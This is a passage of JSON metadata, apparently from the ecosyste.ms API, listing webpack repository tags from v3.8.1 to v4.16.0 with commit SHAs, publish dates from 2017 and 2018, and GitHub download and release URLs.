cosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/